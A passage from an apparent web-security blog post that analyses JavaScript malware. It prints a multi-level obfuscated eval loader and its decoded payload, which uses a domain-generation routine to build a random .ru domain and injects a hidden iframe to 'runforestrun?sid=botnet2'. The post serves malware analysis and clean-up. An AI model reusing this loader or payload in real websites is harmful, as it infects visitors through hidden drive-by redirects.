1,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));

Second obfuscation level

try {

prototype % 2;

} catch (asd) {

x = 2;

}

try {

q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");

q.appendChild(q + "");

} catch (fwbewe) {

i = 0;

try {

prototype * 5;

} catch (z) {

fr = "fromChar";

f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606, 595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684, 575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330, 280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246, 160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606, 580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420, 205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300, 275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312, 275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702, 545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205, 192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264, 160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600, 160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234, 490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234, 515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234, 540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234, 565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234, 590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192, 160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192, 300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690, 455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660, 515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192, 610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510, 702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 60, 160, 192, 160, 192, 580, 684, 605, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585, 660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585, 660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350, 492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170, 690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585, 660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];

v = "eva";

}

if (v) e = window[v + "l"];

w = f;

s = [];

r = String;

z = ((e) ? "Code" : "");

for (; 1776 - 5 + 5 > i; i += 1) {

j = i;

if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));

}

if (f) e(s);

}

Decoded malicious payload

function nextRandomNumber(){

var hi = this.seed / this.Q;

var lo = this.seed % this.Q;

var test = this.A * lo - this.R * hi;

if(test > 0){

this.seed = test;

} else {

this.seed = test + this.M;

}

return (this.seed * this.oneOverM);

}

function RandomNumberGenerator(unix){

var d = new Date(unix*1000);

var s = d.getHours() > 12 ? 1 : 0;

this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));

this.A = 48271;

this.M = 2147483647;

this.Q = this.M / this.A;

this.R = this.M % this.A;

this.oneOverM = 1.0 / this.M;

this.next = nextRandomNumber;

return this;

}

function createRandomNumber(r, Min, Max){

return Math.round((Max-Min) * r.next() + Min);

}

function generatePseudoRandomString(unix, length, zone){

var rand = new RandomNumberGenerator(unix);

var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];

var str = '';

for(var i = 0; i < length; i ++ ){

str += letters[createRandomNumber(rand, 0, letters.length - 1)];

}

return str + '.' + zone;

}

setTimeout(function(){

try{

if(typeof iframeWasCreated == "undefined"){

iframeWasCreated = true;

var unix = Math.round(+new Date()/1000);

* generate random domain name in .ru area

var domainName = generatePseudoRandomString(unix, 16, 'ru');

ifrm = document.createElement("IFRAME");

ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");

ifrm.style.width = "0px";

ifrm.style.height = "0px";

ifrm.style.visibility = "hidden";

document.body.appendChild(ifrm);

}

}catch(e){}

}, 500);

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Quttera web security blog

Pages

Monday, July 29, 2013

Multiple obfuscation to hide JavaScript malware

Malicious JavaScript code protected by multiple obfuscations

Background

First obfuscation level

Second obfuscation level

Decoded malicious payload

Malware clean-up

No comments:

Post a Comment

emergency
249$ /yr
1 domain
Initial Response Time within 4 hrs.
Manual Malware Removal / Full Website Audit
Blacklisting removal
Web Application Firewall (WAF)
Dedicated Malware Analyst
Create Account

economy
149$ /yr
1 domain
Initial Response Time within 12 hrs.
Malware clean-up
Blacklisting removal
24/7 Access to Cybersecurity Professionals
Create Account